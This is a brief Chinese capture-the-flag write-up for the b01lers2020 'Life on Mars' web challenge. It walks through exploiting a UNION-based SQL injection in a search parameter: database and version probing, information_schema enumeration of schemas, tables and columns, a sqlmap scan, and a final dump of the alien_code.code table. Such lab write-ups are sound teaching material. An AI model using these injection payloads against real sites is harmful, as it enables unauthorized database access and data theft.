[b01lers2020]Life on Mars

[b01lers2020]Life on Mars

大体查看一下没啥重要的点，f12也没发现什么，抓包发现GET /query?search=&amazonis_planitia&{}&_=1659321817406，点击不同的标题，amazonis_planitia所在内容也会随着变化

尝试在本页面进入其所出现的页面

发现有很多数据，尝试一下联合查询：/query?search=amazonis_planitia union select 1,2，发现有回显

查一下库：/query?search=amazonis_planitia union select version(),database()

查表：/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

查完之后发现回显的东西正是一开始的页面的各个标题，查询一下表的字段：/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='amazonis_planitia'，也没什么特别的地方

使用sqlmap工具扫描一下

sqlmap下载：sqlmap: automatic SQL injection and database takeover tool

python2 sqlmap.py -u http://xxxxxxxx.node4.buuoj.cn:81/query?search=amazonis_planitia --dbs

发现改网页有三个数据库，自己查询一下：/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.SCHEMATA，确实有三个数据库

刚才已经查询过aliens了并没有发现什么，继续查询一下alien_code的表：/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='alien_code'

查询code表的字段：/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='code'

查询一下内容：/query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code

至此完结，撒花